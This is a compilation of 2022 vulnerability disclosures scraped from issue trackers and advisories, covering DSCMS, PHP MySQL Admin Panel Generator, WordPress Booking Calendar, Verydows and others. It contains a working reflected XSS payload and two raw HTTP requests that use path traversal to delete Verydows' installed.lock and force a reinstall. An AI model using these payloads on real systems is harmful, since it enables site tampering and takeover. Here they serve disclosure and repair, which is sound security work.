DSCMS v3.0 was discovered to contain an arbitrary file deletion vulnerability via /controller/Adv.php.

**Arbitrary file deletion vulnerability**

**评论 (0)**

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120303\_a26bb592\_9830429.jpeg "112.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124119\_947e90b5\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124119\_947e90b5\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

登录 后才可以发表评论

CVE-2022-28114: Arbitrary file deletion vulnerability · Issue #I4ZRMW · 德尚网络/DSCMS_open - Gitee.com

A cross-site scripting (XSS) vulnerability in PHP MySQL Admin Panel Generator v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected at /edit-db.php.

Affected software : php-mysql-admin-panel-generator

Version : N/A

Type of vulnerability : XSS (Cross-Site Scripting)

Author : s7safe

Description:  
php-mysql-admin-panel-generator is susceptible to cross-site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages .

login the system  

PoC :  
turn to http://192.168.146.130/generated/mysql2022-03-26\_02-49/edit-db.php?act=%22%3E%3CScRiPt%3Ealert(%22xss%22)%3C%2FsCrIpT%3E

payload:"><ScRiPt>alert("xss")<%2FsCrIpT>

Successful

Reason:  
Failure to filter or escape special characters leads to vulnerabilities

How to fix :  
escape special characters or filter it .

by s7safe

CVE-2022-28102: Cross-Site Scripting (XSS) - Security Issue  · Issue #19 · housamz/php-mysql-admin-panel-generator

WordPress Booking Calendar plugin versions 9.1 and below suffer from PHP object injection and insecure deserialization vulnerabilities.

    On April 18, 2022, the Wordfence Threat Intelligence team initiated the disclosure process for an Object Injection vulnerability in the Booking Calendar plugin for WordPress, which has over 60,000 installations.We received a response the same day and sent over our full disclosure early the next day, on April 19, 2022. A patched version of the plugin, 9.1.1, was released on April 21, 2022.We released a firewall rule to protect Wordfence Premium,  Wordfence Care, and Wordfence Response customers on April 18, 2022. Sites still running the free version of Wordfence will receive the same protection on May 18, 2022.We recommend that all Wordfence users update to the patched version, 9.1.1, as soon as possible as this will entirely eliminate the vulnerability.Description: Insecure Deserialization/PHP Object InjectionAffected Plugin: Booking CalendarPlugin Slug: bookingPlugin Developer: wpdevelop, opluginsAffected Versions: <= 9.1CVE ID: CVE-2022-1463CVSS Score: 8.1(High)CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Ramuel GallFully Patched Version: 9.1.1The Booking Calendar plugin allows site owners to add a booking system to their site, which includes the ability to publish a flexible timeline showing existing bookings and openings using a shortcode, [bookingflextimeline].The flexible timeline includes the ability to configure viewing preferences and options when viewing the published timeline. Some of these options were passed in PHP’s serialized data format, and unserialized by the define_request_view_params_from_params function in core/timeline/v2/wpbc-class-timeline_v2.php.An attacker could control the serialized data via several methods:- If a timeline was published, an unauthenticated attacker could obtain the nonce required to send an AJAX request with the action set to WPBC_FLEXTIMELINE_NAV and a timeline_obj[options] parameter set to a serialized PHP object.- Any authenticated attacker could use the built-in parse-media-shortcode AJAX action to execute the [bookingflextimeline] shortcode, adding an options attribute in the shortcode set to a serialized PHP object. This would work even on sites without a published timeline.- An attacker with contributor-level privileges or above could also embed the [bookingflextimeline] shortcode containing a malicious options attribute into a post and execute it by previewing it, or obtain the WPBC_FLEXTIMELINE_NAV nonce by previewing the [bookingflextimeline] shortcode and then using method #1.Any time an attacker can control data that is unserialized by PHP, they can inject a PHP object with properties of their choice. If a “POP Chain” is also present, it can allow an attacker to execute arbitrary code, delete files, or otherwise destroy or gain control of a vulnerable website. Fortunately, no POP chain was present in the Booking plugin, so an attacker would require some luck as well as additional research in order to exploit this vulnerability. Nonetheless, POP chains appear in a number of popular software libraries, so many sites could still be exploited if another plugin using one of these libraries is installed.Despite the lack of a POP chain and complexity involved in exploitation, the potential consequences of a successful attack are so severe that Object Injection vulnerabilities still warrant a “High” CVSS score. We’ve written about Object Injection vulnerabilities in the past (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVpBSr3BkC5gW3zCRq11qNCJPW2qd3df4JnTTpN6klYVQ5js6JV3Zsc37CgG1_W4Cc2TH2cMdlnW5f7ykY58sLPNW4pvZXZ2RXFNBW7KbW7x7z0_PZVDPKzv1yW6N0W7v4Xbb94X562Vx_h734dKwtbW64FBwn4PkBrVW6K_MLr53zwDfW4VH96w95ZT3qW11tQ681xsy7DN1dXl29dh69DW4vpJ0h6nhGVSW5XzPFp40K1RFW5PCymh61jdV9W1WSKs76PKR7rV8vsw54MNkD5W1vSwjN3tdZZ0W6JnYnt1kphDLW5BMKJQ4R6zYYW41XMGF5lxxpWN8_KG5xf57l3VJ9Cpq8kNPCqN90_1c3m4f__W2WnhNh1YPPNGVXZkVx2fCwHNW218B8X4s27wRW8VQWWb9jbvCGVY7B375H-KWTW3DGsJC7yVVSRW2jTqcW3Y3VQ6W7jN8Sg7Y3H67V5dYPX7ZdWPjW74Cb_v3bWjCr3bzH1 ) if you’d like to find out more about how they work.TimelineApril 18, 2022 - We release a firewall rule to protect Wordfence Premium, Care, and Response customers. We initiate the disclosure process. The plugin developer verifies the contact method.April 19, 2022 - We send the full disclosure to the plugin developer.April 21, 2022 - A patched version of the Booking Calendar plugin, 9.1.1, is released.May 18, 2022 - The firewall rule becomes available to free Wordfence users.ConclusionIn today’s post, we covered an Object Injection vulnerability in the Booking Calendar plugin. Wordfence Premium, Wordfence Care, and Wordfence Response customers are fully protected from this vulnerability. Sites running the free version of Wordfence will receive the same protection on May 18, 2022, but have the option of updating the Booking calendar plugin to the patched version 9.1.1 to eliminate the risk immediately.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

WordPress Booking Calendar 9.1 PHP Object Injection / Insecure Deserialization

Seacms v11.6 was discovered to contain a remote code execution (RCE) vulnerability via the component /admin/weixin.php.

CVE-2022-27336

In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges.

CVE-2022-27239: Linux CIFS Utils and Samba - Free Knowledge Base

A vulnerability, which was classified as problematic, has been found in GetSimple CMS. Affected by this issue is the file /admin/edit.php of the Content Module. The manipulation of the argument post-content with an input like <script>alert(1)</script> leads to cross site scripting. The attack may be launched remotely but requires authentication. Expoit details have been disclosed within the advisory.

CVE-2022-1503

In Eclipse Openj9 before version 0.32.0, Java 8 & 11 fail to throw the exception captured during bytecode verification when verification is triggered by a MethodHandle invocation, allowing unverified methods to be invoked using MethodHandles.

Description Peter Shipton ![CLA](https://accounts.eclipse.org/user/eca/badge?mail=Peter_Shipton@ca.ibm.com "Eclipse Contributor Agreement") ![Friend](https://www.eclipse.org/donate/web-api/friends_decorator.php?email=Peter_Shipton@ca.ibm.com "Friend of Eclipse")   2022-04-22 12:34:30 EDT

In Eclipse Openj9 before version 0.32.0, Java 8 & 11 fail to throw the exception captured during bytecode verification when verification is triggered by a MethodHandle invocation, allowing unverified methods to be invoked using MethodHandles.

CVE-2021-41041: 579744 – OpenJ9 allows unverified methods to be invoked using MethodHandles

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\file_controller.php.

Vulnerability file: \\protected\\controller\\backend\\file\_controller.php  
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file  
![image](https://user-images.githubusercontent.com/90141086/159689762-0e63e61c-7234-4a9e-884c-5f7cd4bf89bb.png)

Vulnerability to reproduce:

1.  First log in to the background to get cookies。
2.  Here I delete the installed.lock file to verify the existence of the vulnerability，construct the packet as follows:

POST /index.php?m=backend&c=file&a=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index  
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 32

path\[\]=../install/installed.lock

3、Click Send Packet,you can see that the file was deleted successfully  
![image](https://user-images.githubusercontent.com/90141086/159695536-d0b07eb4-9c48-4bc7-a158-0677406160fc.png)

4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page  
![image](https://user-images.githubusercontent.com/90141086/159697683-b812ea24-5a46-4d95-83a0-b239211fb8a9.png)

Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page  
![image](https://user-images.githubusercontent.com/90141086/159696798-eee9f50f-7051-4356-82c1-ef2ddb1621a1.png)

Repair suggestion:

1.  Filter ../ or ..\\ in the file variable
2.  Limit the scope of deleted files or directories

CVE-2022-28058: Arbitrary file deletion vulnerability exists · Issue #20 · Verytops/verydows

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\database_controller.php.

Vulnerable file: \\protected\\controller\\backend\\database\_controller.php  
It can be clearly seen that $file is not security filtered  
Vulnerable code：  
....................................................  
![image](https://user-images.githubusercontent.com/90141086/159718097-6dbba910-c999-4758-b2ad-3035297b0de5.png)

..................................................

Vulnerability to reproduce:  
1、First log in to the background to get the cookie

2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:

POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore  
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 42

file%5B%5D=../../../install/installed.lock

3、Click to send the data package, you can see that the file was deleted successfully  
![image](https://user-images.githubusercontent.com/90141086/159714294-7881f591-14d7-4a4a-9ec1-2e7522e9003b.png)

4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page  
![image](https://user-images.githubusercontent.com/90141086/159714437-d584c580-4580-4ae3-89f7-821da525bc53.png)

So as long as we delete the installed.lock file, we can reinstall the system，When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page  
![image](https://user-images.githubusercontent.com/90141086/159715033-a1925083-2b2e-4e85-9374-7990f0612a83.png)

Repair suggestion:

1、Filter ../ or ..\\ in the file variable  
2、Limit the scope of deleted files or directories

Tag

#php